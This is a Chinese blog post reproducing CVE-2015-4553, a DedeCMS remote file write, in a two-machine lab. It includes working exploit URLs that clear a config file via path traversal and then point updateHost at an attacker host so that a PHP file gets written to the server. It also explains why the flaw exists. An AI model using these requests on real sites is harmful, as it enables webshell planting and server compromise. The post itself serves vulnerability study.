CVE-2015-4553 Dedecms远程写文件

CVE-2015-4553 Dedecms远程写文件

首页

访问

http://192.168.1.3/install/index.php?step=11\&insLockfile=a\&s_lang=a\&install_demo_name=.../data/admin/config_update.php这句话会跳转到http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt中读取内容写入到c:/phpstudy/WWW/config_update.php。访问发现获取失败。

在目标机上192.168.1.3,查看c:/phpstudy/WWW/data/admin/config_update.php,已经由原来的内容变为空的内容。

在192.168.1.2打开phpStudy在C:/phpStudy/WWW下建立dedecms/demodata.a.txt,写入<?php phpinfo();?>

访问:http://192.168.1.3/install/index.php?step=11\&insLockfile=a\&s_lang=a\&install_demo_name=.../data/tchg.php\&updateHost=http://192.168.1.2/,可以看到出现了存在,说明phpinfo已经写进去了![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/ff3eae6b0cc1432ea4c4603c3a954bf2.png)

访问:http://192.168.1.3/data/tchg.php,可以看到phpinfo页面说明真的写进去了。![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/198cefe5a2cf418a9bec2f5ef8fdd5d4.png)

漏洞产生的原因发生在安装页面C:/phpStudy/WWW/install/index.php,如果接收到的参数step=11,然后包含C:/phpStudy/WWW/data/admin/config_update.php。查看config_update.php里面定义了updateHost变量。前面已经把这个文件里的内容给清空了。这里利用了php5.2的特性,全局变量get可以赋值,这样就控制了上传的内容,达到了写shell的目的。

相关推荐
其实防守也摸鱼2 小时前
CTF密码学综合教学指南--第五章
开发语言·网络·笔记·python·安全·网络安全·密码学
纽格立科技6 小时前
安全播出之外的第二条腿——两座老发射台的现场
安全
HackTwoHub7 小时前
Linux 内核史诗级本地提权 全网深度复现、原理完整分析( CVE-2026-31431)
linux·运维·安全·web安全·网络安全·代码审计·安全架构
雪碧聊技术8 小时前
在项目中引入JWT令牌
安全
一拳一个娘娘腔9 小时前
红队与蓝队视角:现代网络安全攻防中的Linux命令深度解析
linux·安全
书源丶10 小时前
三十五、Java 泛型——类型安全的「万能模板」
java·开发语言·安全
Chengbei1113 小时前
AI大模型网关存在SQL注入、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)
数据库·人工智能·sql·安全·web安全·网络安全·系统安全
一拳一个娘娘腔13 小时前
告别图形化界面:基于CLI的Windows系统入侵排查与防御实战手册
windows·安全
hwscom14 小时前
Linux服务器如何进行安全加固,防止黑客攻击(Windows也适用)
linux·服务器·安全
liann11914 小时前
3.4_Linux 应急响应排查速查命令表
linux·运维·服务器·安全·网络安全·系统安全